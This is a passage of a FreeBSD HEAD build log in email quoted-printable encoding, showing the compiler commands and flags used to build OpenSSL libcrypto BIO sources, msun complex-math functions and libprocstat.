PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bio_err.o -MTbio_err.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bio_err= .c -o bio_err.o --- lib/msun__L --- --- s_ccosh.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_ccosh.So -MTs_cc= osh.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_ccosh.c -o s_ccosh.So --- secure/lib/libcrypto__L --- --- bio_lib.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bio_lib.o -MTbio_lib.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bio_lib= .c -o bio_lib.o --- lib/msun__L --- --- s_ccoshf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_ccoshf.So -MTs_c= coshf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_ccoshf.c -o s_ccoshf.So --- s_cexp.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cexp.So -MTs_cex= p.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /src/s_cexp.c -o s_cexp.So --- s_cexpf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cexpf.So -MTs_ce= xpf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_cexpf.c -o s_cexpf.So --- s_cimag.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cimag.So -MTs_ci= mag.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_cimag.c -o s_cimag.So --- secure/lib/libcrypto__L --- --- bss_acpt.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bss_acpt.o -MTbss_acpt.o -s= td=3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-= string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-u= nused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conver= sion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promot= ed-parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/Fre= eBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_a= cpt.c -o bss_acpt.o --- lib/msun__L --- --- s_cimagf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cimagf.So -MTs_c= imagf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_cimagf.c -o s_cimagf.So --- s_cimagl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cimagl.So -MTs_c= imagl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_cimagl.c -o s_cimagl.So --- s_conj.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_conj.So -MTs_con= j.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun= /src/s_conj.c -o s_conj.So --- s_conjf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_conjf.So -MTs_co= njf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_conjf.c -o s_conjf.So --- secure/lib/libcrypto__L --- --- bss_bio.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bss_bio.o -MTbss_bio.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_bio= .c -o bss_bio.o --- lib/msun__L --- --- s_conjl.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_conjl.So -MTs_co= njl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_conjl.c -o s_conjl.So --- s_cproj.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cproj.So -MTs_cp= roj.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_cproj.c -o s_cproj.So --- s_cprojf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_cprojf.So -MTs_c= projf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_cprojf.c -o s_cprojf.So --- s_creal.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_creal.So -MTs_cr= eal.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_creal.c -o s_creal.So --- s_crealf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_crealf.So -MTs_c= realf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_crealf.c -o s_crealf.So --- secure/lib/libcrypto__L --- --- bss_conn.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bss_conn.o -MTbss_conn.o -s= td=3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-= string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-u= nused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conver= sion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promot= ed-parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/Fre= eBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_c= onn.c -o bss_conn.o --- lib/msun__L --- --- s_creall.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_creall.So -MTs_c= reall.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_creall.c -o s_creall.So --- s_csinh.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_csinh.So -MTs_cs= inh.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_csinh.c -o s_csinh.So --- s_csinhf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_csinhf.So -MTs_c= sinhf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_csinhf.c -o s_csinhf.So --- s_ctanh.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_ctanh.So -MTs_ct= anh.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src/s_ctanh.c -o s_ctanh.So --- lib/libprocstat__L --- --- msdosfs.So --- --- secure/lib/libcrypto__L --- --- bss_dgram.o --- --- lib/libprocstat__L --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.msdosfs.So -MTm= sdosfs.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -W= all -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-= prototypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswit= ch -Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wne= sted-externs -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wm= issing-variable-declarations -Wthread-safety -Wno-empty-body -Wno-string-pl= us-int -Wno-unused-const-variable -Qunused-arguments -c /builds/workspace= /FreeBSD_HEAD/src/lib/libprocstat/msdosfs.c -o msdosfs.So --- secure/lib/libcrypto__L --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD 